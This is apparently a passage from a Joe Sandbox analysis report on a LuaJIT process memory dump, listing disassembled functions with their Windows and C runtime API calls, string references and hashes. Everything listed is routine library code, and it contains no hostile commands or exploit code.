_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91E51
_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91EA5
_get_daylight.LIBCMT ref: 00007FF677E91EFD

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: d7edea3600ceb722a4312ef71fba7a806c38da98ddc4022e7886f718fefbdbbf
Instruction ID: 629eedc40b9831690d176aa420c7463ef37a94a6f663fa3f91de596e6341baeb
Opcode Fuzzy Hash: d7edea3600ceb722a4312ef71fba7a806c38da98ddc4022e7886f718fefbdbbf
Instruction Fuzzy Hash: 1B51CC37E2C7068BF7794B28950537E6680AF60764F194839DE0ED62D6DF7CE8408A83

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E90C60 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,00007FF677E20126), ref: 00007FF677E90C90
GetExitCodeProcess.KERNEL32 ref: 00007FF677E90CA2
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF677E20126), ref: 00007FF677E90CBC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00007FF677E20126), ref: 00007FF677E90CF0

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID:
API String ID: 2321548817-0
Opcode ID: 0ac2ff3ce93231d73f59403a5169545862334051fe72a869e1b48455d95cec51
Instruction ID: b7231c97f80c2029101c16d4555a61a43de90f7f360616a6defa02cc5b3bd0e4
Opcode Fuzzy Hash: 0ac2ff3ce93231d73f59403a5169545862334051fe72a869e1b48455d95cec51
Instruction Fuzzy Hash: B5118E33A2C74282FA549F25944023D62A0AF65BA0F944630EE6DC7BD9DF7CE8418B52

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E21FD0 Relevance: 6.0, APIs: 4, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF677E21FF1
GetProcAddress.KERNEL32 ref: 00007FF677E22002
GetModuleHandleExA.KERNEL32 ref: 00007FF677E2201F
GetProcAddress.KERNEL32 ref: 00007FF677E22031

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-0
Opcode ID: 2632887060231f01f8d6da7983ebf0db9170a1dd1ba29d9f7b50d1763c5ff522
Instruction ID: 6401bf0753482c928c8cb5e2102dea4bfded45d886d1d8abb5d5acb81768a6ff
Opcode Fuzzy Hash: 2632887060231f01f8d6da7983ebf0db9170a1dd1ba29d9f7b50d1763c5ff522
Instruction Fuzzy Hash: EEF08C26A2DA8381EE848B02B8D467D63B1FF48BC8B455434DE0E86718EF3CD4518700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E6510C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E65316

Part of subcall function 00007FF677E6B50C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E6B596

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E65151

Strings

, xrefs: 00007FF677E652A1

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 0a8a8d45eaf96d2a73655245a80df36af030cc4d3d42afe52c3477950326923b
Instruction ID: 5e168d618fc8b7271314f82aabb66459b240ff881f7df39af822b8731bb071e5
Opcode Fuzzy Hash: 0a8a8d45eaf96d2a73655245a80df36af030cc4d3d42afe52c3477950326923b
Instruction Fuzzy Hash: 9B614073B3960286E7A88F24C45937C37B2EB16B19F141135DF4AC6299EF7CE685C601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E657E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E65823
_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E659F2

Strings

, xrefs: 00007FF677E6596F

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 2d095834a2104921987fa37a4aff31fa213f193f1dcbe801d9f563858545fc12
Instruction ID: 4600cf34bbeb28b1d4d2ac6cfcc581d70aeef7caa83cdfa596a053349037f646
Opcode Fuzzy Hash: 2d095834a2104921987fa37a4aff31fa213f193f1dcbe801d9f563858545fc12
Instruction Fuzzy Hash: 8B615F73B2825286E7648F2DC04513C3BA5EB09B28F24213ADF5AD6695FF2CE641CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E655D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E65601
_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E65634

Strings

, xrefs: 00007FF677E65782

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-3916222277
Opcode ID: 7336c6b1b8cef402cd81652aea3174f170f050f10262c53445015a526692f56d
Instruction ID: 1cae2caffa7d98d5d194fa27bf7610e18bc4e536ffb6b4ae9bfe81f845deed2b
Opcode Fuzzy Hash: 7336c6b1b8cef402cd81652aea3174f170f050f10262c53445015a526692f56d
Instruction Fuzzy Hash: C9612873B29206CAEB688F28C44527C37A5EB15B59F141135DF4AC6299EF2CEB85CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677DFDEB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

csm, xrefs: 00007FF677DFE00F
CCG , xrefs: 00007FF677DFE018

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
String ID: CCG $csm
API String ID: 3115360832-2763669848
Opcode ID: dc8fccf7ca8e766654be7590a9894087392905afef7ade7a48763b5d94113a86
Instruction ID: 79da4934566eb9807d6e4b82df148bb1f1d78bb11f302ec99cc3e83009b9b9a1
Opcode Fuzzy Hash: dc8fccf7ca8e766654be7590a9894087392905afef7ade7a48763b5d94113a86
Instruction Fuzzy Hash: FC41D223B2CB4582EA249B16E41537D77A1FB49BD4F144331DE6D87B95DE3CE4928B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8B4BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E8B4FF

Strings

e+000, xrefs: 00007FF677E8B5A4
gfff, xrefs: 00007FF677E8B621

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 4d715df011184d0384ef2c0a8b9eb83a41ce5f6d5ed9fe64f526ca6b20865ed3
Instruction ID: e882e0a1636a5dce41b57163e7e5dabeceabd716e220bf1735cc80d81be3985f
Opcode Fuzzy Hash: 4d715df011184d0384ef2c0a8b9eb83a41ce5f6d5ed9fe64f526ca6b20865ed3
Instruction Fuzzy Hash: BA51E763B287C586E7258F3999413697B92E752B90F48A331DF98C7BD6CE2CE444C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E80EB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF677E8113B

Strings

fmod, xrefs: 00007FF677E8110C
!, xrefs: 00007FF677E8112B

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _handle_error
String ID: !$fmod
API String ID: 1757819995-3213614193
Opcode ID: 3486dae74be8d2bf4559ced1ca804f4ce772c55f7fad267fccd18b6ac7307164
Instruction ID: e632ac6f9c30f7d106ef43136cc45d77b78e24ce839b3efc7c3945abbd437298
Opcode Fuzzy Hash: 3486dae74be8d2bf4559ced1ca804f4ce772c55f7fad267fccd18b6ac7307164
Instruction Fuzzy Hash: 4551F817D3DF8285E223973194117BE6768AFA23C4F11A736ED4AB15ADDF2D61234600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8CF28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF677E8D03F
GetLastError.KERNEL32 ref: 00007FF677E8D061

Strings

U, xrefs: 00007FF677E8CFEB

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 64caa10afcb0b3e9bdc43fafa48991d91f9dac045ff2b8f9ba1d715bc28533f2
Instruction ID: 96a7789321cf65a164456f1fcd4e25891d77b9c64c11bb1d223e90b87d251da8
Opcode Fuzzy Hash: 64caa10afcb0b3e9bdc43fafa48991d91f9dac045ff2b8f9ba1d715bc28533f2
Instruction Fuzzy Hash: 60419F23B28B8186EB20CF65E8443AA67A1FB98794F845131EE4DC7798DF3CD451CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E90650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 00007FF677E906FC
_set_errno_from_matherr.LIBCMT ref: 00007FF677E90710

Strings

tanh, xrefs: 00007FF677E90677

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: tanh
API String ID: 1187470696-874243715
Opcode ID: 0df01c4d3716d176c8033b9ee1a2b3e3dcb4d4f7419aade9133a7a272eb46637
Instruction ID: a73f585b5ba163fa953937612ce065a8f5ea38616dea3f257851668d1153d569
Opcode Fuzzy Hash: 0df01c4d3716d176c8033b9ee1a2b3e3dcb4d4f7419aade9133a7a272eb46637
Instruction Fuzzy Hash: A4210977A28646CBE760DF28A44166AB7A0FBD9700F501635FA8DC6B56EF3CE5408F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E288BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF677E85D97

Strings

!, xrefs: 00007FF677E85D83
sqrt, xrefs: 00007FF677E85D58

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _handle_error
String ID: !$sqrt
API String ID: 1757819995-799759792
Opcode ID: 3d8d27d03e2554664d99fe904a843613c1529ac74455d068ca8da587f3d6b841
Instruction ID: b043ad826baad32df059faf9bf05c170a6e81839cfe91201639505d63f97294c
Opcode Fuzzy Hash: 3d8d27d03e2554664d99fe904a843613c1529ac74455d068ca8da587f3d6b841
Instruction Fuzzy Hash: 1D11F633E28B8583DB11CB21944433A6661EF967E4F109331EE7846AD8DF2CE0459B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E899B1
CompareStringW.KERNEL32 ref: 00007FF677E89A39

Strings

CompareStringEx, xrefs: 00007FF677E89994, 00007FF677E899A5

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: b9a81c18c85f8aa471723c89ba3257d79275654ee71a63e90f46d91bca982dcf
Instruction ID: 24dc99ccf51cd751c221b780dc0d055f6174331fa1695ec9dba67d0e8d486c25
Opcode Fuzzy Hash: b9a81c18c85f8aa471723c89ba3257d79275654ee71a63e90f46d91bca982dcf
Instruction Fuzzy Hash: EA11F436A18B8186D760CB16B4402AAB7A4FBC9BD4F144136EEDD83B59CF3CE5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89C51
GetDateFormatW.KERNEL32(?,?,?,?,?,?,?,00007FF677E946C1,?,?,?,?,?,?,?,00000000), ref: 00007FF677E89CB3

Strings

GetDateFormatEx, xrefs: 00007FF677E89C34, 00007FF677E89C45

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: DateFormattry_get_function
String ID: GetDateFormatEx
API String ID: 595753042-159735388
Opcode ID: ae91f775559fdd773db68d2a3df91305be9197e359e4adfaf81ac6ff22e26d2c
Instruction ID: 087e1adc3475c17d493598d15e482cacc00a366ff3744a61dcd8a6e12f64b487
Opcode Fuzzy Hash: ae91f775559fdd773db68d2a3df91305be9197e359e4adfaf81ac6ff22e26d2c
Instruction Fuzzy Hash: 5A113036A18B81C6E750CF59B4404AAB7A0FB88BC0F144135EE8D93B69CF3CD5148B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89D54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89D8D
GetTimeFormatW.KERNEL32(?,?,?,?,?,?,?,00007FF677E94772,?,?,?,?,?,?,?,00000000), ref: 00007FF677E89DE4

Strings

GetTimeFormatEx, xrefs: 00007FF677E89D70, 00007FF677E89D81

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: FormatTimetry_get_function
String ID: GetTimeFormatEx
API String ID: 3261793192-1692793031
Opcode ID: f1ddae523debab6bf048c284bf48d6aace1c9e158f355b230673b210b9cf96d8
Instruction ID: 4e3ddd17478c4309f81e6532a5c5893c3178ba60fb55e70722834f6344437fdc
Opcode Fuzzy Hash: f1ddae523debab6bf048c284bf48d6aace1c9e158f355b230673b210b9cf96d8
Instruction Fuzzy Hash: BC112E36A18B81C6E750CF5AB4005AAB7A4FB88BD0F184535EE9D83B69CE3CD5548B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89E29
GetUserDefaultLCID.KERNEL32(?,?,000000A0,00007FF677E99C60), ref: 00007FF677E89E40

Strings

GetUserDefaultLocaleName, xrefs: 00007FF677E89E0C, 00007FF677E89E16

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: DefaultUsertry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 3217810228-151340334
Opcode ID: 8d9eb975ebd9b73e43f347966b6e4b461a0a53dd1fd7c151eb977a5abb739598
Instruction ID: cd7986c05c5ce8fe7b65fd3f6d7c1981daec6701fd5d301aaaccd00add003cd0
Opcode Fuzzy Hash: 8d9eb975ebd9b73e43f347966b6e4b461a0a53dd1fd7c151eb977a5abb739598
Instruction Fuzzy Hash: DFF08212F2C64282FB545B55B5815B923B1AF48BC0F456076ED1EC6A55CF3CE444C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89E64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89E95
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF677E8DB62,?,?,?,00007FF677E8DA5A,?,?,?,00007FF677E7B59D), ref: 00007FF677E89EAF

Strings

InitializeCriticalSectionEx, xrefs: 00007FF677E89E89

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 9b89a648009126e3679e5c9c6c7b270f53a601a9df6bf21ee630fcfe565e4a35
Instruction ID: a27ba0efc3358f3b7eb74f047510991eb981919a914efe3b39828b3ca92bc86d
Opcode Fuzzy Hash: 9b89a648009126e3679e5c9c6c7b270f53a601a9df6bf21ee630fcfe565e4a35
Instruction Fuzzy Hash: 33F05E27E28B9582EB549B45B4404B96771BF48BC0F455436EE2D83B54CE3CE455C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89BC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89BED
TlsSetValue.KERNEL32(?,?,?,00007FF677E8AF02,?,?,?,00007FF677E7B3E1,?,?,?,?,00007FF677E90643), ref: 00007FF677E89C04

Strings

FlsSetValue, xrefs: 00007FF677E89BDA

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 14eb54919eaf09d7f5c697f3172bdc7af3da22ecbcc84ea25ba25b777209fee2
Instruction ID: 4486b2c5e0db5a165b84132aa3b4127511c6128e6acea529c0f2bda3a83a8eb5
Opcode Fuzzy Hash: 14eb54919eaf09d7f5c697f3172bdc7af3da22ecbcc84ea25ba25b777209fee2
Instruction Fuzzy Hash: FAE09263E2864282FB444B55F4054B96372EF48790F495032DD1D86394CE3DE998C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0FF50 Relevance: 5.1, APIs: 4, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF677E0FF67
EnterCriticalSection.KERNEL32 ref: 00007FF677E0FF97
LeaveCriticalSection.KERNEL32 ref: 00007FF677E0FFF5
Sleep.KERNEL32 ref: 00007FF677E0FFFD

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
